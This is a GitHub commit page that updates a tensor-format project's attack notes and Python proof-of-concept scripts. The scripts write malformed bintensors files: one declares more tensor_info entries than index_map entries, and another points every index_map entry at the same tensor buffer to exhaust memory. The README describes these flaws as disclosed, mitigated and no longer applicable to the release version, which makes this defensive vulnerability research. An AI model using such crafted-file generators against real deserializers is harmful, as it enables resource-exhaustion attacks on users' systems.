Skip to content

Commit f7991fb

Browse files
committed
chore(docs): update attacks from prerelease to release layout #1
1 parent 0941719 commit f7991fb

File tree

4 files changed

+164
-32
lines changed

4 files changed

+164
-32
lines changed

attacks/README.md

Lines changed: 14 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -27,8 +27,21 @@ One of my favourite proposed attacks against `SafeTensors` and this format invol
2727

2828
### Attempt 4
2929

30+
> ⚠️ **Note:** The exploit is no longer applicable in the release version (Rust: `0.1.0`, Python: `0.1.0`) due to significant changes in the file layout compared to the pre-release versions (`0.0.1-alpha.3` / `0.0.5`).
31+
3032
This format vulnerability was unexpected and prompted a thorough review, resulting in a [commit](https://github.com/GnosisFoundation/bintensors/commit/032826e369d301b49eb264090581e24198d3a4ed) that adds the missing validation. The root cause lies in `tensor_info` entries outnumbering their `index_map` counterparts, leading to potential memory allocation mismatches. To mitigate this risk, we introduced a validation check: if the size of `tensor_info` exceeds that of `index_map`, the format is immediately deemed invalid.
3133

3234
This issue is specific to BinTensors and can only arise if the file has been manually altered.
3335

34-
An alternative approach would be to project the data into a format that preserves order, similar to how SafeTensors uses Metadata to construct HashMetadata before serialization. However, in our testing, this method resulted in a ~40% degradation in deserialization performance while providing only a ~1% improvement in serialization efficiency. Given these trade-offs, we opted for the validation-based approach.
36+
### Attempt 5
37+
38+
> ⚠️ **Note:** The exploit is no longer applicable in the release version (Rust: `0.1.0`, Python: `0.1.0`) due to significant changes in the file layout compared to the pre-release versions (`0.0.1-alpha.3` / `0.0.5`).
39+
40+
41+
I had a moment of clarity that led to identifying a critical flaw in the metadata encoding of the format. Specifically, I realized that an attacker could craft an oversized `index_map` to maliciously reference the **same tensor buffer repeatedly**, resulting in the deserialization of **tens or even hundreds of megabytes** from a single tensor entry — all without increasing the actual tensor data footprint.
42+
43+
This vulnerability exposes the system to resource exhaustion attacks and bypasses intended memory boundaries.
44+
45+
### Proposed Mitigation
46+
47+
To resolve this issue, the internal `Metadata` structure was redesigned into a more organized and deterministic format, minimizing the risk of errors. Details of the new format can be found in the [specification](https://github.com/GnosisFoundation/bintensors/blob/master/specs/encoding.md#-header-reconstruction).

attacks/av_attempt_3.py

Lines changed: 19 additions & 28 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@
2222
"F64": 14,
2323
}
2424

25-
from typing import Tuple, List
25+
from typing import Tuple
2626

2727

2828
def encode_unsigned_variant_encoding(number: int) -> bytes:
@@ -37,31 +37,23 @@ def encode_unsigned_variant_encoding(number: int) -> bytes:
3737
return number.to_bytes(1, "little")
3838

3939

40-
def encode_tensor_info(dtype: str, shape: Tuple[int, ...], offset: Tuple[int, int]) -> List[bytes]:
41-
"""Encodes the struct TensorInfo into byte buffer"""
40+
def encode_header(id: str, dtype: str, shape: Tuple[int, ...], offset: Tuple[int, int]) -> bytes:
41+
"""Encodes the struct TensorInfo into byte buffer with string ID prefix."""
4242
if dtype not in _DTYPE:
4343
raise ValueError(f"Unsupported dtype: {dtype}")
4444

45-
# flatten out the tensor info
46-
layout = chain([_DTYPE[dtype], len(shape)], shape, offset)
47-
return b"".join(list(map(encode_unsigned_variant_encoding, layout)))
45+
encoded_id = encode_unsigned_variant_encoding(len(id)) + id.encode("utf-8")
4846

49-
50-
def encode_hash_map(index_map: Dict[str, int]) -> List[bytes]:
51-
"""Encodes a dictionary of string keys and integer values."""
52-
length = encode_unsigned_variant_encoding(len(index_map))
53-
54-
hash_map_layout = chain.from_iterable(
55-
(
56-
encode_unsigned_variant_encoding(len(k)),
57-
k.encode("utf-8"),
58-
encode_unsigned_variant_encoding(v),
59-
)
60-
for k, v in index_map.items()
47+
# Compose numeric fields
48+
numeric_layout = chain(
49+
[_DTYPE[dtype], len(shape)],
50+
shape,
51+
offset
6152
)
6253

63-
return b"".join(chain([length], hash_map_layout))
54+
encoded_tensor_info = b"".join(encode_unsigned_variant_encoding(x) for x in numeric_layout)
6455

56+
return encoded_id + encoded_tensor_info
6557

6658
filename = "bintensors_abuse_attempt_3.bt"
6759

@@ -74,14 +66,10 @@ def create_payload(size: int):
7466
length = encode_unsigned_variant_encoding(size)
7567

7668
# Create tensor info buffer
77-
tensor_info_buffer = b"".join(encode_tensor_info("F32", shape, (0, tensor_chunk_length)) for _ in range(size))
78-
layout_tensor_info = length + tensor_info_buffer
79-
80-
# Create hash map layout
81-
hash_map_layout = encode_hash_map({f"weight_{i}": i for i in range(size)})
69+
header = b"".join(encode_header(f"weight_{i}", "F32", shape, (0, tensor_chunk_length)) for i in range(size))
8270

8371
# Construct full layout
84-
layout = b"\0" + layout_tensor_info + hash_map_layout
72+
layout = b"\x00" + length + header
8573
layout += b" " * (((8 - len(layout)) % 8) % 8)
8674
n = len(layout)
8775
n_header = n.to_bytes(8, "little")
@@ -92,10 +80,13 @@ def create_payload(size: int):
9280
f.write(layout)
9381
f.write(b"\0" * tensor_chunk_length)
9482

95-
print(f"Payload written to {filename}")
83+
84+
print(f"[✓] Payload written: {filename}")
9685

9786

9887
if __name__ == "__main__":
99-
create_payload(5)
100-
print(f"The file {filename} is {os.path.getsize(filename) / 10_000_00} Mb")
88+
create_payload(100)
89+
print(f"[✓] Size: {os.path.getsize(filename) / 1_000_000:.5f} MB")
10190
load_file(filename)
91+
92+

attacks/av_attempt_4.py

Lines changed: 8 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -4,6 +4,7 @@
44
from typing import List, Dict
55
from itertools import chain
66

7+
78
_DTYPE = {
89
"BOL": 0,
910
"U8": 1,
@@ -103,6 +104,10 @@ def create_payload(size: int):
103104

104105

105106
if __name__ == "__main__":
106-
create_payload(2)
107-
print(f"The file {filename} is {os.path.getsize(filename) / 10_000_00} Mb")
108-
print(load_file(filename))
107+
import warnings
108+
import bintensors
109+
if bintensors.__version__ <= "0.0.5":
110+
warnings.warn("This attack will be depricated within the release version of bintensors, and only applies 0.0.5 and below.")
111+
create_payload(2)
112+
print(f"The file {filename} is {os.path.getsize(filename) / 10_000_00} Mb")
113+
print(load_file(filename))

attacks/av_attempt_5.py

Lines changed: 123 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,123 @@
1+
# Safetensors attack proposal #5
2+
import os
3+
import torch
4+
from bintensors.torch import load_file, load, save
5+
from typing import List, Dict
6+
from itertools import chain
7+
8+
9+
# Maps each dtype name to the integer tag written into the serialized header.
#
# The final entry used to be a second "F64" key, which silently replaced
# "F64": 12 with 14 (a dict literal keeps only the last duplicate).
# NOTE(review): tag 14 is assumed to be U64 — the only 64-bit type missing
# from the table, and the entry that follows I64 in the safetensors Dtype
# ordering. Confirm against the bintensors spec.
_DTYPE = {
    "BOL": 0,
    "U8": 1,
    "I8": 2,
    "F8_E5M2": 3,
    "F8_E4M3": 4,
    "I16": 5,
    "U16": 6,
    "F16": 7,
    "BF16": 8,
    "I32": 9,
    "U32": 10,
    "F32": 11,
    "F64": 12,
    "I64": 13,
    "U64": 14,
}
26+
27+
from typing import Tuple, List
28+
29+
30+
def encode_unsigned_variant_encoding(number: int) -> bytes:
    """Encode an unsigned integer into a variable-length byte string.

    Values up to ``0xFA`` are emitted as a single byte. Larger values are
    emitted as a one-byte marker followed by the value in little-endian
    order: ``0xFB`` + 2 bytes, ``0xFC`` + 4 bytes, or ``0xFD`` + 8 bytes.

    Args:
        number: The non-negative integer to encode.

    Returns:
        The encoded bytes (1, 3, 5 or 9 bytes long).

    Raises:
        OverflowError: If ``number`` is negative or does not fit in 8 bytes
            (raised by ``int.to_bytes``).
    """
    # Check the widest range first so each value lands in the smallest
    # encoding that can hold it.
    if number > 0xFFFFFFFF:
        return b"\xfd" + number.to_bytes(8, "little")
    if number > 0xFFFF:
        return b"\xfc" + number.to_bytes(4, "little")
    if number > 0xFA:
        return b"\xfb" + number.to_bytes(2, "little")
    return number.to_bytes(1, "little")
40+
41+
42+
def encode_tensor_info(dtype: str, shape: Tuple[int, ...], offset: Tuple[int, int]) -> bytes:
    """Encode one TensorInfo record into a byte buffer.

    The fields are written in order — dtype tag, number of dimensions, each
    dimension, then the two offset values — each as a variable-length
    unsigned integer.

    Args:
        dtype: A key of ``_DTYPE`` naming the element type.
        shape: The tensor dimensions.
        offset: The pair of offset values stored for the tensor.

    Returns:
        The concatenated encoded fields as a single ``bytes`` object.

    Raises:
        ValueError: If ``dtype`` is not a key of ``_DTYPE``.
    """
    if dtype not in _DTYPE:
        raise ValueError(f"Unsupported dtype: {dtype}")

    # flatten out the tensor info
    layout = chain([_DTYPE[dtype], len(shape)], shape, offset)
    return b"".join(map(encode_unsigned_variant_encoding, layout))
50+
51+
52+
def custom_encode_hash_map(index_map: Dict[str, int]) -> bytes:
    """Encode a string-keyed map, pointing every key at index 0.

    Layout: the entry count, then for each key its length, its UTF-8 bytes,
    and the value ``0``. The values stored in ``index_map`` are deliberately
    ignored; writing ``0`` for every key is the payload of this attack.

    Args:
        index_map: Mapping whose keys (and entry count) are serialized.

    Returns:
        The encoded map as a single ``bytes`` object.
    """
    parts = [encode_unsigned_variant_encoding(len(index_map))]

    for key in index_map:
        # The length prefix counts encoded bytes, not characters, so it
        # always matches the key bytes that follow it.
        raw_key = key.encode("utf-8")
        parts.append(encode_unsigned_variant_encoding(len(raw_key)))
        parts.append(raw_key)
        parts.append(encode_unsigned_variant_encoding(0))  # payload

    return b"".join(parts)
66+
67+
filename = "bintensors_abuse_attempt_5.bt"


def create_payload(size: int):
    """Generates a binary payload with tensor metadata and hash map layout.

    The payload is an 8-byte little-endian header length, the header
    (a zero byte, the TensorInfo section, the index map, space-padded to a
    multiple of 8 bytes), and 20 zero bytes of tensor data. It is written to
    ``filename`` and also returned.

    NOTE: ``size`` is written as the TensorInfo count and sets the number of
    index-map keys, but exactly two TensorInfo records are always emitted, so
    the declared count only matches the records when ``size == 2``.

    Args:
        size: Declared entry count and number of ``weight_{i}`` keys.

    Returns:
        The full payload bytes that were written to ``filename``.
    """
    length = encode_unsigned_variant_encoding(size)

    # Create tensor info buffer
    tensor_info_buffer = b"".join(
        [
            encode_tensor_info("F32", (1, 1), (0, 4)),
            encode_tensor_info("F32", (2, 2), (4, 20)),
        ]
    )
    layout_tensor_info = length + tensor_info_buffer

    # Create index_map { "weight_0" : 0, "weight_1" : 0 } same index
    hash_map_layout = custom_encode_hash_map({f"weight_{i}": i for i in range(size)})

    # Construct full layout, padded with spaces up to the next multiple of 8
    layout = b"\0" + layout_tensor_info + hash_map_layout
    layout += b" " * (-len(layout) % 8)
    n_header = len(layout).to_bytes(8, "little")

    # Build the payload once so the file and the return value cannot diverge
    payload = n_header + layout + (b"\0" * 20)

    # Write payload to file
    with open(filename, "wb") as f:
        f.write(payload)

    print(f"Payload written to {filename}")
    return payload
109+
110+
111+
if __name__ == "__main__":
    import re
    import warnings
    import bintensors

    # Compare the version numerically. As plain strings, "0.0.10" <= "0.0.5"
    # is True, so a lexicographic check misorders multi-digit components.
    # Only the first three numeric components are used, so a pre-release
    # such as "0.0.1-alpha.3" compares as (0, 0, 1).
    version_parts = tuple(int(part) for part in re.findall(r"\d+", bintensors.__version__)[:3])

    # NOTE(review): the original indentation was lost in this rendering; the
    # payload run is assumed to sit inside the version check — confirm.
    if version_parts <= (0, 0, 5):
        warnings.warn("This attack will be depricated within the release version of bintensors, and only applies 0.0.5 and below.")
        create_payload(2)
        print(f"The file {filename} is {os.path.getsize(filename) / 1_000_000} Mb")
        buffer = load_file(filename)
        print(buffer)
122+
123+

0 commit comments

Comments
 (0)